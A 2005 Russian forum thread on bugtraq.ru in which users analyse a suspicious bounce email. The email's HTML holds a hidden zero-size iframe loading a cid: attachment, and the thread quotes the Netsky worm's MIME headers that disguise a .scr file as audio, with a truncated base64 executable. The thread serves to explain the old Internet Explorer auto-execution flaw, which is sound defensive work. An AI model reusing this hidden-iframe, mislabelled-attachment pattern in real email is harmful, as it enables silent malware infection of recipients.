информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Бэкдор в xz/liblzma, предназначенный...   Три миллиона электронных замков...   Doom на газонокосилках
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / miscellaneous		Имя Пароль

ФОРУМ если вы видите этот текст, отключите в настройках форума использование JavaScript регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. Странное письмо пришло 04.04.05 00:24   Автор: Heller <Heller> Статус: Elderman <"чистая" ссылка> Письмо с темой "Mail Delivery Failure" и текстом: If the message will not displayed automatically, follow the link to read the delivered message. Received message is available at: А вот дальше в HTML-коде письма написано такое: <a href=cid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=0 width=0>www.heller.ru/inbox/heller/read.php?sessionid-13236</a> <iframe src=cid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=0 width=0></iframe> Что бы это могло значить? троян какой то письмо недослал 04.04.05 00:56   Автор: Killer{R} <Dmitry> Статус: Elderman <"чистая" ссылка> либо троян сам написал письмо с такой темой и собой в аттаче да его антивирь на сервере вырезал из письма либо троян слал комуто письмо от твоего адреса и тебе вернулось сообщение о том что не дошло. Мне такие тоннами приходят Ж( Меня больше интересует что означает это "cid:что-то_непонятное" заместо URL'а 04.04.05 01:56   Автор: Heller <Heller> Статус: Elderman Отредактировано 04.04.05 01:57  Количество правок: 1 <"чистая" ссылка> Это старый эксплойт для запуска приаттаченного .exe-шника. 04.04.05 10:25   Автор: :-) <:-)> Статус: Elderman <"чистая" ссылка> Это старый эксплойт для запуска приаттаченного .exe-шника. Многие червяки его используют. Дальше там должно быть примерно следующее (взято из червя Netsky.35328): Content-Type: audio/x-wav name="message.scr" Content-Transfer-Encoding: base64 Content-ID:<031401Mfdab4$3f3dL780$73387018@57W81fa70Re> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAYAAAAA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAAAAAA ... Incorrect MIME Header Can Cause IE to Execute E-mail Attachment Спасибо, разобрался. 05.04.05 02:05   Автор: Heller <Heller> Статус: Elderman <"чистая" ссылка> 1

Copyright © 2001-2024 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach